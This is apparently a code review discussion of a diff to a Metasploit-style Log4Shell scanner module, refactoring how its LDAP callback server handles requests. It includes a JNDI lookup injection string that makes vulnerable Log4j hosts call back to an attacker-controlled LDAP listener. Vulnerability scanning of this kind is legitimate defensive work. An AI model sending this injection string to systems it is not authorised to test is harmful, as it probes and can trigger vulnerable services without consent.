modules/auxiliary/scanner/http/log4shell_scanner.rb

```diff
@@ -71,44 +69,60 @@ def jndi_string(resource)
     "${jndi:ldap://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{resource}/${sys:java.vendor}_${sys:java.version}}"
   end
 
-  def on_client_connect(client)
-    client.extend(Net::BER::BERParser)
-    pdu = Net::LDAP::PDU.new(client.read_ber(Net::LDAP::AsnSyntax))
-    return unless pdu.app_tag == Net::LDAP::PDU::BindRequest
-
-    response = [
-      pdu.message_id.to_ber,
-      [
-        Net::LDAP::ResultCodeSuccess.to_ber_enumerated, ''.to_ber, ''.to_ber
-      ].to_ber_appsequence(Net::LDAP::PDU::BindResult)
-    ].to_ber_sequence
-    client.write(response)
-
-    pdu = Net::LDAP::PDU.new(client.read_ber(Net::LDAP::AsnSyntax))
-    return unless pdu.app_tag == Net::LDAP::PDU::SearchRequest
-
-    base_object = pdu.search_parameters[:base_object].to_s
-    token, java_version = base_object.split('/', 2)
-
-    target_info = @mutex.synchronize { @tokens.delete(token) }
-    if target_info
-      details = normalize_uri(target_info[:target_uri]).to_s
-      details << " (header: #{target_info[:headers].keys.first})" unless target_info[:headers].nil?
-      details << " (java: #{java_version})" unless java_version.blank?
-      peerinfo = "#{target_info[:rhost]}:#{target_info[:rport]}"
-      print_good("#{peerinfo.ljust(21)} - Log4Shell found via #{details}")
-      report_vuln(
-        host: target_info[:rhost],
-        port: target_info[:rport],
-        info: "Module #{fullname} detected Log4Shell vulnerability via #{details}",
-        name: name,
-        refs: references
-      )
+  #
+  # Handle incoming requests via service mixin
+  #
+  def on_dispatch_request(client, data)
+    return if data.strip.empty?
+
+    data.extend(Net::BER::Extensions::String)
+    begin
+      pdu = Net::LDAP::PDU.new(data.read_ber!(Net::LDAP::AsnSyntax))
+      vprint_status("LDAP request data remaining: #{data}") if data.length > 0
+      resp = case pdu.app_tag
```

Comment:
I might be missing some nuances here, but can this just call `super(client, data)` for a majority of the ldap response handling here?

```ruby
case pdu.app_tag
  when Net::LDAP::PDU::SearchRequest
       ... report creds etc, but don't respond ...
end

# Normal happy path ldap behaviour
super(cilent, data)
```

Reply:
Probably, but then users of the module wont see the whole method and kids these days can't find lib with the `locate` command. :wink: 
In all seriousness though it is there for both clarity and because its a proc handler to avoid craziness of bleeding down from super in a separate execution context of a proc.